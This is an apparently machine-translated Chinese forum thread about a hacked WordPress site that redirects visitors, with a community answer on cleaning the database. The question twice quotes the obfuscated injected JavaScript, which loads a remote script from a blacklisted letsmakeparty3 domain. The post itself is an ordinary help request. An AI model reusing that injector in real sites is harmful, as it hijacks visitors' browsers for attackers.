如何解决WordPress重定向黑客攻击？

Question

我的网站https://spicecarts.in刚刚被黑了！它正在重定向到其他网站！我用这个工具检查了https://sitecheck.sucuri.net/results/https/spicecarts.in 并发现错误1.已知的javascript恶意软件：恶意软件.注入？35.27

Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,97,108,108,111, 119,46,108,101,116,115,109,97,107,101,112,97,114,116,121,51,46,103,97,47,108 ,46,106,115,63,100,61,49);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[ 0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

重定向至https://spicecarts.in/

2.此页面包含来自Letsmakeparty3.ga的JavaScript/iframe，已被Sucuri Labs列入黑名单，原因：注入脚本，请参见https://labs.sucuri.net/?blacklist=letsmakeparty3.ga

https://allow.letsmakeparty3.ga/request?Type=api&query=034/wp-content/plugins/super-progressive-web-apps/public/js/register-sw.js

3.在https://spicecarts.in/wp-includes/css/中发现如下恶意软件

Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,97,108,108,111, 119,46,108,101,116,115,109,97,107,101,112,97,114,116,121,51,46,103,97,47,108 ,46,106,115,63,100,61,49);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[ 0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

怎么解决这个问题啊！

Answer 1

首先，冷静下来。我的网站也遇到了同样的问题SQL injection attack，以下是我的解决方法。确保backup你的database第一个。

1. 前往您的phpmyadmin并打开wp_options桌子。将option_valueofsiteurl和更新home为您网站 url 的 url，/末尾不带结尾，例如https://yourwebsite.com。更新后，您现在可以登录您的网站。

2. 登录您的网站并删除选项，transient您可以使用wp-optimize插件删除transient如下选项：

3. 总之，您需要做的就是清理您的database. 有一些插件可以进行此类清理。您也可以搜索database并letsmakeparty3删除它们。